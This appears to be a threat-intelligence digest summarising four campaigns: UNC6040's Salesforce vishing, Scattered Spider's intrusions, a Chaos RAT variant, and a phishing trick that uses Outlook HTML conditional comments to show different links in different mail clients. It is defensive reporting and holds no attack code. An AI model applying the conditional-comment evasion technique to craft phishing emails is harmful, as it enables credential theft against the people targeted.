Update: UNC6040 Vishing Campaign Exploits Salesforce for Data Theft and Extortion
UNC6040, a financially motivated threat group, has been running a series of highly targeted voice phishing (vishing) campaigns aimed at Salesforce environments, with operations starting in late 2024 and continuing into 2025. Google's Threat Intelligence Group (GTIG) and Mandiant were instrumental in uncovering the details of this phishing campaign, providing key insights into how the attackers leveraged social engineering tactics to breach Salesforce environments and exfiltrate sensitive data. This threat group specializes in social engineering tactics, impersonating IT support personnel to trick employees into granting access to Salesforce’s connected apps, specifically by convincing them to approve a malicious version of Salesforce’s legitimate Data Loader tool. Once this malicious app is authorized, attackers can query and exfiltrate sensitive data, including personally identifiable information (PII), financial data, and business processes. The group’s success stems from its ability to exploit human error without relying on exploiting inherent vulnerabilities in Salesforce itself. In several reported instances, stolen data has been used for extortion, with UNC6040 attempting to monetize the information months after initial exfiltration. The attack method has been successfully employed, leading to widespread breaches, particularly impacting multinational corporations using Salesforce for data management. Salesforce responded to these attacks in March 2025, confirming that no security vulnerabilities within its platform were exploited and emphasizing that the breaches resulted from social engineering. Although no direct vulnerability in Salesforce was involved, the company reinforced the importance of Multi-Factor Authentication (MFA) and user vigilance against phishing schemes. The attackers have utilized phishing pages to collect credentials and often pair these tactics with infrastructure like Mullvad VPNs and Okta phishing panels to further access cloud-based systems. To mitigate the risk, Salesforce recommends implementing strict connected app management, enforcing least privilege access controls, and utilizing Salesforce Shield to monitor for unusual data download activities. The attack highlights the importance of securing cloud environments and proactively defending against social engineering threats.
Sophisticated Phishing Attack Exploits Outlook’s HTML Rendering to Bypass Security
SANS researchers have identified a sophisticated phishing campaign that uses Microsoft Outlook's HTML rendering capabilities to bypass security systems while successfully deceiving users. The attack leverages HTML conditional statements, specifically the <!--[if mso]> and <!--[if !mso]> blocks, which are typically used for compatibility between different email clients. When viewed in Outlook, the email displays benign links to appear legitimate to both users and security systems, while users viewing the email in non-Outlook clients (like Gmail, Apple Mail, or Thunderbird) are redirected to malicious phishing sites. This technique allows attackers to evade detection by corporate security infrastructure that mainly scans emails rendered in Outlook, making this phishing attack particularly effective against corporate environments. First identified in 2019, this tactic has resurfaced in 2025, targeting employees in financial institutions and other organizations. The phishing campaign typically masquerades as an email from banks requesting account verification, tricking users into clicking malicious links that lead to credential-harvesting websites. The risk and impact of this phishing technique are significant. Attackers can steal sensitive information, including login credentials, without triggering traditional email security defenses. This poses a serious threat to organizations relying on Outlook, especially those in sectors handling sensitive data, as the emails appear legitimate and bypass detection by standard security measures. Microsoft has not issued a specific response to this particular exploit, but the issue lies in using HTML conditional comments compatible with older rendering technologies. To mitigate this risk, organizations should deploy multi-engine email scanners that test email content across different email clients, use URL reputation checks to validate embedded links and ensure employees are educated about verifying suspicious emails. Additionally, implementing strict email security measures, including multi-factor authentication (MFA), can help reduce the potential impact of such phishing attempts.
Update: Scattered Spider Targeting High-Value Sectors
Scattered Spider, a highly sophisticated and financially motivated cybercriminal group, has emerged as a significant threat to industries including Hospitality, Telecommunications, Finance, and Retail. Since at least 2022, the group has combined advanced social engineering techniques with technical expertise. Their attack methods heavily rely on voice phishing (vishing), impersonating IT support personnel to trick employees into bypassing multi-factor authentication (MFA), often by convincing them to reset MFA or access accounts. One of their most notable campaigns occurred in 2023 when they breached MGM Resorts, causing significant disruption to IT systems. Their modus operandi involves detailed reconnaissance through open-source intelligence (OSINT) to profile targets and exploit human error in high-stress environments. Once inside, they use tools like Mimikatz and Cobalt Strike to harvest credentials, escalate privileges, and exfiltrate sensitive data before deploying ransomware. Their hybrid approach includes using DragonForce, a Ransomware-as-a-Service (RaaS) platform, for encryption and ransom negotiation, allowing them to focus on initial access and data exfiltration while outsourcing encryption and ransom logistics. The group’s deep understanding of corporate environments enables them to easily navigate complex IT systems, targeting services like Single Sign-On (SSO), VPNs, and RDP gateways for lateral movement across networks. Their attack chain is typically rapid, often completed in under 48 hours, making it difficult for organizations to detect and respond before significant damage occurs. Notably, Scattered Spider has partnered with other cybercriminal groups, including their use of DragonForce, to bolster their ransomware operations. The group also exhibits tactics resembling nation-state Advanced Persistent Threat (APT) groups, leading to speculation about possible ties to certain countries, though attribution remains unclear. Their use of legitimate administrative tools, alongside techniques for disabling security controls and deleting logs, further complicates incident response efforts. The group’s focus on high-value targets and the theft of sensitive data underscores the strategic nature of their campaigns, with extortion demands often followed by threats to leak data. To defend against Scattered Spider, organizations must implement rigorous identity verification protocols, phishing-resistant MFA, and robust endpoint detection and response (EDR/XDR) solutions. Security teams should also conduct regular training to prepare staff for social engineering attacks and implement proactive defenses to detect lateral movement within the network.
Chaos RAT Variant Targets Windows and Linux Systems for Remote Access
A new variant of the Chaos RAT, an open-source remote access trojan (RAT) written in Golang, has emerged as a significant threat to both Windows and Linux systems, with its usage reported in attacks since late 2022. Initially discovered by Acronis researchers, the trojan is usually distributed through phishing campaigns; Chaos RAT is delivered via malicious links or attachments masquerading as legitimate tools, including a network troubleshooting utility for Linux environments. Once installed, the RAT establishes a connection with an external server to await commands, allowing attackers to perform various malicious activities, including reverse shell execution, file manipulation, system reconnaissance, taking screenshots, and controlling the machine remotely. The malware has been predominantly linked to cryptocurrency mining operations, with specific attention given to the XMRig miner, but its capabilities extend beyond that. The trojan’s administration panel allows attackers to build custom payloads and control infected devices, mimicking popular frameworks like Cobalt Strike and Sliver. The latest version of Chaos RAT, 5.0.3, was released on May 31, 2024, and includes further improvements and features that increase its sophistication and stealth. The primary distribution method for Chaos RAT involves tricking victims into downloading what appears to be a useful utility— "NetworkAnalyzer[.]tar[.]gz"—through phishing emails or counterfeit websites. Once installed, the trojan ensures persistence by modifying system files, including the Linux crontab, to periodically fetch and re-install itself. The weaponization of open-source malware continues to grow, complicating attribution efforts and increasing the scale of attacks. Security teams are urged to monitor for unusual network activity and implement strong phishing defenses to mitigate the impact of this evolving threat.
